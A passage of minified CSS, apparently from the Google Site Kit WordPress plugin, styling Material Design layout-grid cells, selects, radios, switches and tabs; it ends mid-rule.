.mdc-layout-grid__inner{height:100%}.googlesitekit-plugin .mdc-layout-grid__cell--align-left{margin-right:auto;width:auto}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--align-left{justify-self:start}}.googlesitekit-plugin .mdc-layout-grid__cell--align-right{margin-left:auto;width:auto}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--align-right{justify-self:end}}@media(min-width: 0){.googlesitekit-plugin .mdc-layout-grid__cell--align-right-phone{margin-left:auto;width:auto}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--align-right-phone{justify-self:end}}}@media(min-width: 601px){.googlesitekit-plugin .mdc-layout-grid__cell--align-right-tablet{margin-left:auto;width:auto}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--align-right-tablet{justify-self:end}}}@media(min-width: 961px){.googlesitekit-plugin .mdc-layout-grid__cell--align-right-desktop{margin-left:auto;width:auto}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--align-right-desktop{justify-self:end}}}@media(min-width: 600px){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1{margin-left:8.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-1{grid-column-start:2}.googlesitekit-plugin .mdc-layout-grid__cell--offset-2{margin-left:16.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-2{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-2{grid-column-start:3}.googlesitekit-plugin .mdc-layout-grid__cell--offset-3{margin-left:25%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-3{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-3{grid-column-start:4}.googlesitekit-plugin .mdc-layout-grid__cell--offset-4{margin-left:33.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-4{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-4{grid-column-start:5}.googlesitekit-plugin .mdc-layout-grid__cell--offset-5{margin-left:41.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-5{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-5{grid-column-start:6}.googlesitekit-plugin .mdc-layout-grid__cell--offset-6{margin-left:50%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-6{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-6{grid-column-start:7}.googlesitekit-plugin .mdc-layout-grid__cell--offset-7{margin-left:58.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-7{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-7{grid-column-start:8}.googlesitekit-plugin .mdc-layout-grid__cell--offset-8{margin-left:66.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-8{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-8{grid-column-start:9}.googlesitekit-plugin .mdc-layout-grid__cell--offset-9{margin-left:75%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-9{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-9{grid-column-start:10}.googlesitekit-plugin .mdc-layout-grid__cell--offset-10{margin-left:83.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-10{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-10{grid-column-start:11}.googlesitekit-plugin .mdc-layout-grid__cell--offset-11{margin-left:91.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-11{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-11{grid-column-start:12}.googlesitekit-plugin .mdc-layout-grid__cell--offset-12{margin-left:100%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-12{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-12{grid-column-start:13}}@media(min-width: 0){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1-phone{margin-left:8.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-1-phone{grid-column-start:2}.googlesitekit-plugin .mdc-layout-grid__cell--offset-2-phone{margin-left:16.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-2-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-2-phone{grid-column-start:3}.googlesitekit-plugin .mdc-layout-grid__cell--offset-3-phone{margin-left:25%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-3-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-3-phone{grid-column-start:4}.googlesitekit-plugin .mdc-layout-grid__cell--offset-4-phone{margin-left:33.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-4-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-4-phone{grid-column-start:5}.googlesitekit-plugin .mdc-layout-grid__cell--offset-5-phone{margin-left:41.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-5-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-5-phone{grid-column-start:6}.googlesitekit-plugin .mdc-layout-grid__cell--offset-6-phone{margin-left:50%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-6-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-6-phone{grid-column-start:7}.googlesitekit-plugin .mdc-layout-grid__cell--offset-7-phone{margin-left:58.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-7-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-7-phone{grid-column-start:8}.googlesitekit-plugin .mdc-layout-grid__cell--offset-8-phone{margin-left:66.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-8-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-8-phone{grid-column-start:9}.googlesitekit-plugin .mdc-layout-grid__cell--offset-9-phone{margin-left:75%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-9-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-9-phone{grid-column-start:10}.googlesitekit-plugin .mdc-layout-grid__cell--offset-10-phone{margin-left:83.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-10-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-10-phone{grid-column-start:11}.googlesitekit-plugin .mdc-layout-grid__cell--offset-11-phone{margin-left:91.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-11-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-11-phone{grid-column-start:12}.googlesitekit-plugin .mdc-layout-grid__cell--offset-12-phone{margin-left:100%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-12-phone{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-12-phone{grid-column-start:13}}@media(min-width: 601px){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1-tablet{margin-left:8.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-1-tablet{grid-column-start:2}.googlesitekit-plugin .mdc-layout-grid__cell--offset-2-tablet{margin-left:16.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-2-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-2-tablet{grid-column-start:3}.googlesitekit-plugin .mdc-layout-grid__cell--offset-3-tablet{margin-left:25%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-3-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-3-tablet{grid-column-start:4}.googlesitekit-plugin .mdc-layout-grid__cell--offset-4-tablet{margin-left:33.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-4-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-4-tablet{grid-column-start:5}.googlesitekit-plugin .mdc-layout-grid__cell--offset-5-tablet{margin-left:41.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-5-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-5-tablet{grid-column-start:6}.googlesitekit-plugin .mdc-layout-grid__cell--offset-6-tablet{margin-left:50%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-6-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-6-tablet{grid-column-start:7}.googlesitekit-plugin .mdc-layout-grid__cell--offset-7-tablet{margin-left:58.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-7-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-7-tablet{grid-column-start:8}.googlesitekit-plugin .mdc-layout-grid__cell--offset-8-tablet{margin-left:66.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-8-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-8-tablet{grid-column-start:9}.googlesitekit-plugin .mdc-layout-grid__cell--offset-9-tablet{margin-left:75%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-9-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-9-tablet{grid-column-start:10}.googlesitekit-plugin .mdc-layout-grid__cell--offset-10-tablet{margin-left:83.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-10-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-10-tablet{grid-column-start:11}.googlesitekit-plugin .mdc-layout-grid__cell--offset-11-tablet{margin-left:91.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-11-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-11-tablet{grid-column-start:12}.googlesitekit-plugin .mdc-layout-grid__cell--offset-12-tablet{margin-left:100%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-12-tablet{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-12-tablet{grid-column-start:13}}@media(min-width: 961px){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1-desktop{margin-left:8.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-1-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-1-desktop{grid-column-start:2}.googlesitekit-plugin .mdc-layout-grid__cell--offset-2-desktop{margin-left:16.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-2-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-2-desktop{grid-column-start:3}.googlesitekit-plugin .mdc-layout-grid__cell--offset-3-desktop{margin-left:25%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-3-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-3-desktop{grid-column-start:4}.googlesitekit-plugin .mdc-layout-grid__cell--offset-4-desktop{margin-left:33.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-4-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-4-desktop{grid-column-start:5}.googlesitekit-plugin .mdc-layout-grid__cell--offset-5-desktop{margin-left:41.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-5-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-5-desktop{grid-column-start:6}.googlesitekit-plugin .mdc-layout-grid__cell--offset-6-desktop{margin-left:50%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-6-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-6-desktop{grid-column-start:7}.googlesitekit-plugin .mdc-layout-grid__cell--offset-7-desktop{margin-left:58.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-7-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-7-desktop{grid-column-start:8}.googlesitekit-plugin .mdc-layout-grid__cell--offset-8-desktop{margin-left:66.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-8-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-8-desktop{grid-column-start:9}.googlesitekit-plugin .mdc-layout-grid__cell--offset-9-desktop{margin-left:75%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-9-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-9-desktop{grid-column-start:10}.googlesitekit-plugin .mdc-layout-grid__cell--offset-10-desktop{margin-left:83.3333333333%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-10-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-10-desktop{grid-column-start:11}.googlesitekit-plugin .mdc-layout-grid__cell--offset-11-desktop{margin-left:91.6666666667%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-11-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-11-desktop{grid-column-start:12}.googlesitekit-plugin .mdc-layout-grid__cell--offset-12-desktop{margin-left:100%}@supports(display: grid){.googlesitekit-plugin .mdc-layout-grid__cell--offset-12-desktop{margin-left:0}}.googlesitekit-plugin .mdc-layout-grid__cell--start-12-desktop{grid-column-start:13}}@media(min-width: 0){.googlesitekit-plugin .mdc-layout-grid__cell--order-1-phone{order:1}.googlesitekit-plugin .mdc-layout-grid__cell--order-2-phone{order:2}.googlesitekit-plugin .mdc-layout-grid__cell--order-3-phone{order:3}.googlesitekit-plugin .mdc-layout-grid__cell--order-4-phone{order:4}.googlesitekit-plugin .mdc-layout-grid__cell--order-5-phone{order:5}.googlesitekit-plugin .mdc-layout-grid__cell--order-6-phone{order:6}.googlesitekit-plugin .mdc-layout-grid__cell--order-7-phone{order:7}.googlesitekit-plugin .mdc-layout-grid__cell--order-8-phone{order:8}.googlesitekit-plugin .mdc-layout-grid__cell--order-9-phone{order:9}.googlesitekit-plugin .mdc-layout-grid__cell--order-10-phone{order:10}.googlesitekit-plugin .mdc-layout-grid__cell--order-11-phone{order:11}.googlesitekit-plugin .mdc-layout-grid__cell--order-12-phone{order:12}}@media(min-width: 601px){.googlesitekit-plugin .mdc-layout-grid__cell--order-1-tablet{order:1}.googlesitekit-plugin .mdc-layout-grid__cell--order-2-tablet{order:2}.googlesitekit-plugin .mdc-layout-grid__cell--order-3-tablet{order:3}.googlesitekit-plugin .mdc-layout-grid__cell--order-4-tablet{order:4}.googlesitekit-plugin .mdc-layout-grid__cell--order-5-tablet{order:5}.googlesitekit-plugin .mdc-layout-grid__cell--order-6-tablet{order:6}.googlesitekit-plugin .mdc-layout-grid__cell--order-7-tablet{order:7}.googlesitekit-plugin .mdc-layout-grid__cell--order-8-tablet{order:8}.googlesitekit-plugin .mdc-layout-grid__cell--order-9-tablet{order:9}.googlesitekit-plugin .mdc-layout-grid__cell--order-10-tablet{order:10}.googlesitekit-plugin .mdc-layout-grid__cell--order-11-tablet{order:11}.googlesitekit-plugin .mdc-layout-grid__cell--order-12-tablet{order:12}}@media(min-width: 961px){.googlesitekit-plugin .mdc-layout-grid__cell--order-1-desktop{order:1}.googlesitekit-plugin .mdc-layout-grid__cell--order-2-desktop{order:2}.googlesitekit-plugin .mdc-layout-grid__cell--order-3-desktop{order:3}.googlesitekit-plugin .mdc-layout-grid__cell--order-4-desktop{order:4}.googlesitekit-plugin .mdc-layout-grid__cell--order-5-desktop{order:5}.googlesitekit-plugin .mdc-layout-grid__cell--order-6-desktop{order:6}.googlesitekit-plugin .mdc-layout-grid__cell--order-7-desktop{order:7}.googlesitekit-plugin .mdc-layout-grid__cell--order-8-desktop{order:8}.googlesitekit-plugin .mdc-layout-grid__cell--order-9-desktop{order:9}.googlesitekit-plugin .mdc-layout-grid__cell--order-10-desktop{order:10}.googlesitekit-plugin .mdc-layout-grid__cell--order-11-desktop{order:11}.googlesitekit-plugin .mdc-layout-grid__cell--order-12-desktop{order:12}}.googlesitekit-plugin .mdc-linear-progress{margin:32px 0}.googlesitekit-plugin .mdc-linear-progress .mdc-linear-progress__bar-inner{background-color:#3c7251}@media(min-width: 960px){.googlesitekit-plugin .mdc-linear-progress{margin:48px 0}}.googlesitekit-plugin .mdc-linear-progress--small{max-width:150px}.googlesitekit-plugin .mdc-linear-progress--compress{margin:0}.googlesitekit-plugin .mdc-list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item{margin:0}.googlesitekit-plugin .mdc-list.mdc-list--underlined .mdc-list-item,.googlesitekit-plugin .mdc-list.mdc-list--underlined .googlesitekit-view-only-menu .googlesitekit-view-only-menu__list-item,.googlesitekit-plugin .googlesitekit-view-only-menu .mdc-list.mdc-list--underlined .googlesitekit-view-only-menu__list-item{border-bottom:1px solid #ebeef0;padding-left:0;padding-right:0}.mdc-menu-surface{box-shadow:0 1.25px 5px 0 rgba(0,0,0,.19),0 .33px 1.5px 0 rgba(0,0,0,.039);border-radius:16px}.googlesitekit-plugin .mdc-menu-surface{left:auto !important;right:-8px;top:calc(100% + 10px) !important;width:calc(100% + 8px)}.mdc-menu-surface--open{z-index:10000}.googlesitekit-plugin .mdc-radio .mdc-radio__native-control:enabled:not(:checked)+.mdc-radio__background .mdc-radio__outer-circle{border-color:#000}.googlesitekit-plugin .mdc-radio .mdc-radio__native-control:enabled:checked+.mdc-radio__background .mdc-radio__outer-circle{border-color:#000}.googlesitekit-plugin .mdc-radio .mdc-radio__native-control:enabled+.mdc-radio__background .mdc-radio__inner-circle{border-color:#000}.googlesitekit-plugin .mdc-radio .mdc-radio__background::before{background-color:#265c3b}.googlesitekit-plugin .mdc-radio .mdc-radio__native-control{appearance:none;background:transparent;border:none;border-radius:0;box-shadow:none;clear:none;color:#161b18;cursor:inherit;display:block;height:100%;line-height:normal;margin:0;min-width:auto;opacity:0;outline:0;padding:0;text-align:center;transition:none;width:100%;z-index:1}.googlesitekit-plugin .mdc-radio.mdc-radio--align-left{margin-left:-10px}.googlesitekit-plugin .mdc-radio__description{color:#6c726e;font-size:12px;line-height:1.33}.googlesitekit-plugin .mdc-select{max-width:100%}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled) .mdc-select__native-control,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled) .mdc-select__selected-text{color:#161b18}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled) .mdc-floating-label{color:#161b18}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-floating-label{color:#161b18}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled) .mdc-notched-outline__trailing{border-color:#b8bdb9}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#757575}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-width:2px}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-color:#3c7251}.googlesitekit-plugin .mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-line-ripple{background-color:#446199}.googlesitekit-plugin .mdc-select .mdc-notched-outline .mdc-notched-outline__leading{border-radius:8px 0 0 8px}[dir=rtl] .googlesitekit-plugin .mdc-select .mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select .mdc-notched-outline .mdc-notched-outline__leading[dir=rtl]{border-radius:0 8px 8px 0}.googlesitekit-plugin .mdc-select .mdc-notched-outline .mdc-notched-outline__trailing{border-radius:0 8px 8px 0}[dir=rtl] .googlesitekit-plugin .mdc-select .mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-select .mdc-notched-outline .mdc-notched-outline__trailing[dir=rtl]{border-radius:8px 0 0 8px}.googlesitekit-plugin .mdc-select .mdc-select__native-control{border-radius:8px}.googlesitekit-plugin .mdc-select .mdc-select__selected-text{display:block;overflow:hidden;text-overflow:ellipsis}.googlesitekit-plugin .mdc-select .mdc-select__native-control{appearance:none;box-shadow:none;height:56px !important;line-height:1.75rem;margin:0;padding:20px 26px 4px 16px}.googlesitekit-plugin .mdc-select.mdc-select--focused:not(.mdc-select--disabled) .mdc-floating-label--float-above{color:#3c7251}.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled) .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled) .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled) .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-width:2px}.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-color:#ac4220}.googlesitekit-plugin .mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-line-ripple{background-color:#ac4220}.googlesitekit-plugin .mdc-select--minimal{background-color:transparent;background-position:right center;display:block;height:20px;line-height:1;margin:0 0 -6px;padding-bottom:6px;width:90px}.googlesitekit-plugin .mdc-select--minimal::before{background-color:transparent}.googlesitekit-plugin .mdc-select--outlined .mdc-select__native-control{background-color:transparent;border:none;box-shadow:none;display:flex;padding:12px 26px 12px 16px;z-index:1}.googlesitekit-plugin .mdc-select--minimal .mdc-select__selected-text{border:none;font-size:12px !important;height:14px !important;letter-spacing:.2px;line-height:1;min-width:0;padding:0 18px 0 0;text-align:right;text-indent:0}.googlesitekit-plugin .mdc-select--minimal .mdc-select__dropdown-icon{bottom:2px;right:-5px}.googlesitekit-plugin .mdc-select--focused .mdc-select__dropdown-icon{transform:rotate(180deg) translateY(0)}.googlesitekit-plugin .mdc-select+.mdc-select-helper-text{color:#6c726e;font-size:12px;letter-spacing:.2px;line-height:1.33;margin:10px 0 0;opacity:1}.googlesitekit-plugin .mdc-select+.mdc-select-helper-text::before{display:none}.googlesitekit-plugin .mdc-switch{vertical-align:middle}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__track{background-color:#3c7251;border-color:#3c7251}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb{background-color:#3c7251;border-color:#3c7251}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay::before,.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay::after{background-color:#3c7251}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay:hover::before{opacity:.04}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb-underlay.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__thumb{background-color:#3c7251;border-color:#3c7251}.googlesitekit-plugin .mdc-switch.mdc-switch--checked .mdc-switch__track{background-color:#b8e5ca;border-color:#b8e5ca}.googlesitekit-plugin .mdc-switch:not(.mdc-switch--checked) .mdc-switch__thumb{background-color:#6c726e;border-color:#6c726e}.googlesitekit-plugin .mdc-switch:not(.mdc-switch--checked) .mdc-switch__track{background-color:#cbd0d3;border-color:#cbd0d3}.googlesitekit-plugin .mdc-switch .mdc-switch__native-control{appearance:none;background:transparent;border:none;box-shadow:none;clear:none;color:#161b18;cursor:pointer;display:block;height:48px;line-height:normal;margin:0;min-width:auto;outline:0;padding:0;text-align:center;transition:none;vertical-align:middle;width:68px}.googlesitekit-plugin .mdc-switch .mdc-switch__native-control::before{opacity:0 !important}.googlesitekit-plugin .mdc-switch+label{font-size:14px;letter-spacing:.25px;line-height:1.43;margin-left:10px}.googlesitekit-plugin .mdc-switch .mdc-switch__track{opacity:1}.googlesitekit-plugin .mdc-switch .mdc-switch__thumb{box-shadow:none}.googlesitekit-plugin .mdc-tab{font-size:12px;letter-spacing:.2px;line-height:1;text-transform:none}.googlesitekit-plugin .mdc-tab.mdc-tab--active .mdc-tab__text-label{color:#3c7251}.googlesitekit-plugin .mdc-tab .mdc-tab__ripple::before,.googlesitekit-plugin .mdc-tab .mdc-tab__ripple::after{background-color:#3c7251}.googlesitekit-plugin .mdc-tab .mdc-tab__ripple:hover::before{opacity:.04}.googlesitekit-plugin .mdc-tab .mdc-tab__ripple:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .mdc-tab .mdc-tab__ripple.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-tab .mdc-tab__ripple:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .mdc-tab .mdc-tab__ripple:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .mdc-tab .mdc-tab__ripple.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .mdc-tab:hover{-webkit-text-decoration:none;text-decoration:none}.googlesitekit-plugin .mdc-tab:focus{color:#3c7251;outline:none}.googlesitekit-plugin .mdc-tab[disabled]{cursor:default}.googlesitekit-plugin .mdc-tab[disabled] .mdc-tab__ripple{display:none}.googlesitekit-plugin .mdc-tab[disabled] .mdc-tab__text-label{color:#999f9b;opacity:.6}.googlesitekit-plugin 